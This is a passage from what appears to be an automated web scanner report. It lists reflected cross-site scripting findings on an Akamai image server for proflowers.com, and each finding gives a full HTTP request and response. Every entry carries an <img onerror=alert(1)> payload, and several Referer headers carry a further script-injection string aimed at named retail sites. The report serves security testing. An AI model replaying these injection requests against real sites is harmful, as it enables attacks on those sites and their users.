Content-Type: text/plain
Content-Length: 112
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:07 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ443e5<img src=a onerror=alert(1)>94aad6f4a68

4.150. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload d1ba3<img%20src%3da%20onerror%3dalert(1)>a60921a1341 was submitted in the REST URL parameter 9. This input was echoed as d1ba3<img src=a onerror=alert(1)>a60921a1341 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQd1ba3<img%20src%3da%20onerror%3dalert(1)>a60921a1341?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:11 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKNSNCKCHC_SnkAttkv2_Core_10_SQd1ba3<img src=a onerror=alert(1)>a60921a1341

4.151. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload adbc9<img%20src%3da%20onerror%3dalert(1)>5310c9a9fa6 was submitted in the REST URL parameter 9. This input was echoed as adbc9<img src=a onerror=alert(1)>5310c9a9fa6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQadbc9<img%20src%3da%20onerror%3dalert(1)>5310c9a9fa6?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 116
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:48 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CONSSTRTTWR_GvnSpringTower_SPR_11_SQadbc9<img src=a onerror=alert(1)>5310c9a9fa6

4.152. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4d8aa<img%20src%3da%20onerror%3dalert(1)>3b6dc5e579c was submitted in the REST URL parameter 9. This input was echoed as 4d8aa<img src=a onerror=alert(1)>3b6dc5e579c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ4d8aa<img%20src%3da%20onerror%3dalert(1)>3b6dc5e579c?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 104
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:16 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_PUS1441_SwtTwr_EDY_11_SQ4d8aa<img src=a onerror=alert(1)>3b6dc5e579c

4.153. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload f6cb8<img%20src%3da%20onerror%3dalert(1)>ebea8158570 was submitted in the REST URL parameter 9. This input was echoed as f6cb8<img src=a onerror=alert(1)>ebea8158570 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SUN10yellowfill_pnk11_PFf6cb8<img%20src%3da%20onerror%3dalert(1)>ebea8158570?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:13 GMT
Connection: close

Unable to find /ProvideCommerce/SUN10yellowfill_pnk11_PFf6cb8<img src=a onerror=alert(1)>ebea8158570

4.154. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e6bab<img%20src%3da%20onerror%3dalert(1)>4ea615db158 was submitted in the REST URL parameter 9. This input was echoed as e6bab<img src=a onerror=alert(1)>4ea615db158 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PFe6bab<img%20src%3da%20onerror%3dalert(1)>4ea615db158?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 95
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:50 GMT
Connection: close

Unable to find /ProvideCommerce/TUL15assrt_sgv09_PFe6bab<img src=a onerror=alert(1)>4ea615db158

4.155. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 1c0f1<img%20src%3da%20onerror%3dalert(1)>785ef5a0184 was submitted in the REST URL parameter 9. This input was echoed as 1c0f1<img src=a onerror=alert(1)>785ef5a0184 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF1c0f1<img%20src%3da%20onerror%3dalert(1)>785ef5a0184?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/TUL20assrt_grn10_test_PF1c0f1<img src=a onerror=alert(1)>785ef5a0184

4.156. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5317<img%20src%3da%20onerror%3dalert(1)>da90941c6d7 was submitted in the REST URL parameter 9. This input was echoed as b5317<img src=a onerror=alert(1)>da90941c6d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30assrt_tv11_catalog_PFb5317<img%20src%3da%20onerror%3dalert(1)>da90941c6d7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:08 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30assrt_tv11_catalog_PFb5317<img src=a onerror=alert(1)>da90941c6d7

4.157. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 2eb13<img%20src%3da%20onerror%3dalert(1)>daf816ec27c was submitted in the REST URL parameter 9. This input was echoed as 2eb13<img src=a onerror=alert(1)>daf816ec27c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL30purple_purpletrmp11_PF2eb13<img%20src%3da%20onerror%3dalert(1)>daf816ec27c?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 103
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:54 GMT
Connection: close

Unable to find /ProvideCommerce/TUL30purple_purpletrmp11_PF2eb13<img src=a onerror=alert(1)>daf816ec27c

4.158. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload bf2d8<img%20src%3da%20onerror%3dalert(1)>e597a089cde was submitted in the REST URL parameter 9. This input was echoed as bf2d8<img src=a onerror=alert(1)>e597a089cde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TropOrgSmplrPF_lbf2d8<img%20src%3da%20onerror%3dalert(1)>e597a089cde?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 92
Cache-Control: no-store
Date: Mon, 09 May 2011 12:23:25 GMT
Connection: close

Unable to find /ProvideCommerce/TropOrgSmplrPF_lbf2d8<img src=a onerror=alert(1)>e597a089cde

4.159. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 9159b<img%20src%3da%20onerror%3dalert(1)>e6aa7594d00 was submitted in the REST URL parameter 9. This input was echoed as 9159b<img src=a onerror=alert(1)>e6aa7594d00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m9159b<img%20src%3da%20onerror%3dalert(1)>e6aa7594d00?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 93
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTherbal09book_m9159b<img src=a onerror=alert(1)>e6aa7594d00

4.160. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4e41e<img%20src%3da%20onerror%3dalert(1)>33229c41e77 was submitted in the REST URL parameter 9. This input was echoed as 4e41e<img src=a onerror=alert(1)>33229c41e77 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF4e41e<img%20src%3da%20onerror%3dalert(1)>33229c41e77?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTlavendarluxe_PF4e41e<img src=a onerror=alert(1)>33229c41e77

4.161. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload e84a1<img%20src%3da%20onerror%3dalert(1)>2db1c5fbe55 was submitted in the REST URL parameter 9. This input was echoed as e84a1<img src=a onerror=alert(1)>2db1c5fbe55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_le84a1<img%20src%3da%20onerror%3dalert(1)>2db1c5fbe55?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 94
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/WRTremembrance09_le84a1<img src=a onerror=alert(1)>2db1c5fbe55

4.162. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload a0a24<img%20src%3da%20onerror%3dalert(1)>c317587d015 was submitted in the REST URL parameter 9. This input was echoed as a0a24<img src=a onerror=alert(1)>c317587d015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_la0a24<img%20src%3da%20onerror%3dalert(1)>c317587d015?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:11 GMT
Connection: close

Unable to find /ProvideCommerce/WRTsympathy_la0a24<img src=a onerror=alert(1)>c317587d015

4.163. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 57238<img%20src%3da%20onerror%3dalert(1)>343bdc9b250 was submitted in the REST URL parameter 9. This input was echoed as 57238<img src=a onerror=alert(1)>343bdc9b250 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn57238<img%20src%3da%20onerror%3dalert(1)>343bdc9b250?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=50&hei=50 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: no-store
Date: Mon, 09 May 2011 12:09:28 GMT
Connection: close

Unable to find /ProvideCommerce/accgenblue09_tn57238<img src=a onerror=alert(1)>343bdc9b250

4.164. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7cd4b<img%20src%3da%20onerror%3dalert(1)>1abce527698 was submitted in the REST URL parameter 9. This input was echoed as 7cd4b<img src=a onerror=alert(1)>1abce527698 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0007703b7cd4b<img%20src%3da%20onerror%3dalert(1)>1abce527698?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.personalcreations.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:26 GMT
Connection: close

Unable to find /ProvideCommerce/p0007703b7cd4b<img src=a onerror=alert(1)>1abce527698

4.165. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868b

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b9a40<img%20src%3da%20onerror%3dalert(1)>618e53e1f8f was submitted in the REST URL parameter 9. This input was echoed as b9a40<img src=a onerror=alert(1)>618e53e1f8f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/p0074868bb9a40<img%20src%3da%20onerror%3dalert(1)>618e53e1f8f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=174&hei=174 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
